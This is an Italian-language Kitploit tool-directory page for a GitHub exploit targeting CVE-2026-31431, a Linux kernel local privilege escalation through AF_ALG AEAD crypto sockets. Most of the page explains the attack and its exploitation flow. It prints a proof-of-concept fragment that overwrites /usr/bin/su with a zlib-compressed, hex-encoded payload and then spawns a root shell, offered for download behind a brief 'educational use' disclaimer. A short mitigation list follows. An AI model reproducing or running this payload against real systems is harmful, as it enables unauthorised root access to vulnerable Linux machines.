Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-31431 — Exploit di escalation dei privilegi locali per CVE-2026-31431, che abusa della gestione dei socket AF_ALG AEAD per ottenere l'accesso a una shell di root su kernel Linux vulnerabili. | Kitploit
Strumenti/GitHubGitHub/adityabhatt3010/cve-2026-31431
Escalation di PrivilegiFramework di ExploitExploitBinary Exploitation
GitHubadityabhatt3010/cve-2026-31431

CVE-2026-31431

Exploit di escalation dei privilegi locali per CVE-2026-31431, che abusa della gestione dei socket AF_ALG AEAD per ottenere l'accesso a una shell di root su kernel Linux vulnerabili.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
33 mesi faNon ancora revisionato

📌 CVE-2026-31431 – Escalata dei privilegi tramite uso improprio dei socket crittografici AEAD

🧠 Panoramica

CVE-2026-31431 è una vulnerabilità di escalation dei privilegi in Linux che abusa dell'interfaccia AF_ALG (API crittografica del kernel). Creando un'interazione dannosa con i socket AEAD (Autenticazione Crittografata con Dati Associati), un attaccante può aumentare i propri privilegi ed eseguire codice come root.

Questa vulnerabilità sfrutta una gestione impropria delle operazioni sui socket crittografici, consentendo una manipolazione controllata della memoria e la conseguente escalation dei privilegi.


⚠️ Impatto

  • Escalata locale dei privilegi
  • Accesso a una shell root (/usr/bin/su)
  • Colpisce i sistemi con implementazioni crittografiche vulnerabili del kernel

🔍 Analisi Tecnica

L'exploit:

  • Crea un socket AF_ALG

  • Si associa a:

    root@kitploit:~
    authenc(hmac(sha256),cbc(aes))
    
  • Utilizza payload appositamente costruiti tramite setsockopt e sendmsg

  • Attiva un comportamento indesiderato del kernel

  • Accede a una shell root tramite:

    root@kitploit:~
    g.system("su")
    

Indicatori chiave:

  • Uso di socket(38,5,0) → AF_ALG
  • Manipolazione AEAD
  • Scritture di memoria controllate tramite payload compresso (zlib)

💻 Proof of Concept (PoC)

PoC

🔑 Frammento del Payload Principale:

**Disclaimer: Non possiedo questo PoC. È solo a scopo educativo per test in ambienti dove è disponibile l'autorizzazione. L'autore/proprietario non sarà responsabile di alcun uso improprio. **

root@kitploit:~
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))

while i<len(e):
    c(f,i,e[i:i+4])
    i+=4

g.system("su")

🚀 Flusso di Sfruttamento

  1. Inizializzare il socket crittografico
  2. Configurare i parametri AEAD
  3. Inviare il payload appositamente costruito
  4. Attivare il difetto del kernel
  5. Sovrascrivere il flusso di esecuzione
  6. Generare una shell root

🛡️ Mitigazione

  • Applicare la patch al kernel all'ultima versione
  • Limitare l'accesso ai socket AF_ALG
  • Utilizzare policy LSM (AppArmor/SELinux)
  • Monitorare un uso anomalo dell'API crittografica

🙏 Crediti

  • PoC: https://github.com/theori-io/copy-fail-CVE-2026-31431

Scarica lo strumento